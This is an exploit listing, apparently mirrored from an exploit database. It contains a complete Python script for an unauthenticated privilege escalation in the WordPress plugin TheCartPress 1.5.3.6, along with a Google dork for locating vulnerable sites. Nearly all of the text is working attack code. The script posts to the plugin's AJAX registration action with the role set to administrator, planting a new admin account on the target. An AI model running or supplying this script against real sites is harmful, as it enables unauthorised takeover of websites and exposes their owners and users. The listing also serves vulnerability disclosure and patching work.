Exploit for WordPress TheCartPress 1.5.3.6 Privilege Escalation

## https://sploitus.com/exploit?id=PACKETSTORM:164403
# Exploit Title: Wordpress Plugin TheCartPress 1.5.3.6 - Privilege Escalation (Unauthenticated)  
# Google Dork: inurl:/wp-content/plugins/thecartpress/  
# Date: 04/10/2021  
# Exploit Author: spacehen  
# Vendor Homepage: https://wordpress.org/plugin/thecartpress  
# Version: <= 1.5.3.6  
# Tested on: Ubuntu 20.04.1  
  
import os.path  
from os import path  
import json  
import requests;  
import sys  
  
def print_banner():  
print("TheCartPress <= 1.5.3.6 - Unauthenticated Privilege Escalation")  
print("Author -> space_hen (www.github.com/spacehen)")  
  
def print_usage():  
print("Usage: python3 exploit.py [target url]")  
print("Ex: python3 exploit.py https://example.com")  
  
def vuln_check(uri):  
response = requests.get(uri)  
raw = response.text  
if ("User name is required" in raw):  
return True;  
else:  
return False;  
  
def main():  
  
print_banner()  
if(len(sys.argv) != 2):  
print_usage();  
sys.exit(1);  
  
base = sys.argv[1]  
  
ajax_action = 'tcp_register_and_login_ajax'  
admin = '/wp-admin/admin-ajax.php';  
  
uri = base + admin + '?action=' + ajax_action ;  
check = vuln_check(uri);  
  
if(check == False):  
print("(*) Target not vulnerable!");  
sys.exit(1)  
  
data = {  
"tcp_new_user_name" : "admin_02",  
"tcp_new_user_pass" : "admin1234",  
"tcp_repeat_user_pass" : "admin1234",  
"tcp_new_user_email" : "test@test.com",  
"tcp_role" : "administrator"  
}  
print("Inserting admin...");  
response = requests.post(uri, data=data )  
if (response.text == "\"\""):  
print("Success!")  
print("Now login at /wp-admin/")  
else:  
print(response.text)  
  
main();